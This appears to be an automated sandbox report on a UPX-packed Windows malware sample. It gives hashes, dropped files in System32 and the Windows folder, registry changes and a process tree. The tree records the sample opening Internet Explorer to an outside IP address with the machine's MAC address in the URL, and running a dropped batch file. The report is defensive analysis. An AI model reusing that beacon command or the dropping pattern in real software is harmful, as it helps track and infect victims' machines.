41d9a03c85cbed5f38cf8ae1bf8c266af5913c9c43cdff1c04d6c298dbf7bf6a

General

Target

439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe
Size

38KB
MD5

439a5be09c51b34f5f2fc19ab48a10eb
SHA1

2e3e2454f4781c1ff9bff4c6f484a8cb9f60d929
SHA256

41d9a03c85cbed5f38cf8ae1bf8c266af5913c9c43cdff1c04d6c298dbf7bf6a
SHA512

86db2e27004f6cfee18d726f08c872bc94bb8aa5938d42a5009a221dfb3be241c85394d42d7cb35b601cee03aaf7e33024feefadd4725aa9df9ead473056bbd4
SSDEEP

768:FlprLMm52o2tX4IrwPxNZF3BzVzFAU8aUud9Kr5OLG6wlcs6H:1rLVb2BfwZjJFAU8Lu/ucl

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
1680	kernel64.exe
1980	mfc64.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4772-0-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/4772-10-0x0000000000400000-0x0000000000422000-memory.dmp	upx

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	\??\c:\windows\SysWOW64\kernel64.exe	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe
File created	\??\c:\windows\SysWOW64\shanchu.bat	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	\??\c:\windows\mfc64.exe	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe

Modifies Internet Explorer settings 1 TTPs 13 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{8E64AC36-4167-11EF-A8A8-CAEAA890B1DB} = "0"	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\""	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\GPU	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2650514177-1034912467-4025611726-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeSystemtimePrivilege	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe
Token: SeSystemtimePrivilege	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
336	IEXPLORE.EXE

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
336	IEXPLORE.EXE
336	IEXPLORE.EXE
2040	IEXPLORE.EXE
2040	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 4772 wrote to memory of 336	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe	86
PID 4772 wrote to memory of 336	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe	86
PID 336 wrote to memory of 2040	336	IEXPLORE.EXE	87
PID 336 wrote to memory of 2040	336	IEXPLORE.EXE	87
PID 336 wrote to memory of 2040	336	IEXPLORE.EXE	87
PID 4772 wrote to memory of 5112	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe	90
PID 4772 wrote to memory of 5112	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe	90
PID 4772 wrote to memory of 5112	4772	439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe	90

C:\Users\Admin\AppData\Local\Temp\439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\439a5be09c51b34f5f2fc19ab48a10eb_JaffaCakes118.exe"
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4772
- C:\Program Files\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://121.10.108.207:8080/king/statAdd.jsp?pc=001&mac=CA:EA:A8:90:B1:DB
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:336
- - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
    "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:336 CREDAT:17410 /prefetch:2
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:2040
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c c:\windows\system32\shanchu.bat
  2⤵
  PID:5112

\??\c:\windows\SysWOW64\kernel64.exe
c:\windows\SysWOW64\kernel64.exe
1⤵
- Executes dropped EXE
PID:1680

\??\c:\windows\mfc64.exe
c:\windows\mfc64.exe
1⤵
- Executes dropped EXE
PID:1980

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\kernel64.exe

Filesize
47KB

MD5
266247944df96e03d45c9ffe3a302fe4

SHA1
4865a8cca8a5e4b2a33a4186a2d846d3f091c7b8

SHA256
3db07af2a22f7ea224651e41e834f775d5015ce8dbb08a1710eee6e09a24fb98

SHA512
42907b8ea1fa048cae96714419f809f1b6e43471b2b90a5e6983b6af62d4332bdfcdf271c83204c8c78caec5e31830e0a4d8e9bae8a6ac6bf686df44c2b6db0e

Download Submit
C:\Windows\mfc64.exe

Filesize
25KB

MD5
515ad186c42093ea026bb29e7c1838e1

SHA1
9a16c52a37733f80d705eb94a112ece8519c7fff

SHA256
6a15be68b506e774908583a78b11479921faa7159ce76676ff1fdc9361588879

SHA512
ff7f4baaff4598fbf585f6e9f158b92fffebd0cdbe23c7bea42d16d100246a80660ec813f83f56e2f07688c846745fd1095cd48bf1322ea93171dcfadac6eb88

Download Submit
\??\c:\windows\SysWOW64\shanchu.bat

Filesize
212B

MD5
20f5c38befe50c8632f74db99694647a

SHA1
1c944326df2e8144d4f5202d841ddee41e55accc

SHA256
5459f847f1e1fa4e70710f7a5cdb6a68a4368dfb0e550dcb036f16e0686fdce5

SHA512
5841ea338b909f6c6bf2ad6706bf6fd55cca795558c2149dfb431d643e925411de362f28ff4ced801c73afcb32562a92823f9421989156a422c680f864492722

Download Submit
memory/1680-34-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-32-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-12-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-36-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-14-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-24-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-16-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-38-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-18-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-30-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-20-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-28-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-22-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1680-26-0x0000000000400000-0x000000000044A000-memory.dmp

Filesize
296KB

Download
memory/1980-23-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-31-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-39-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-27-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-21-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-29-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-19-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-25-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-17-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-33-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-15-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-35-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-13-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/1980-37-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/4772-10-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4772-0-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download

Analysis

Sharing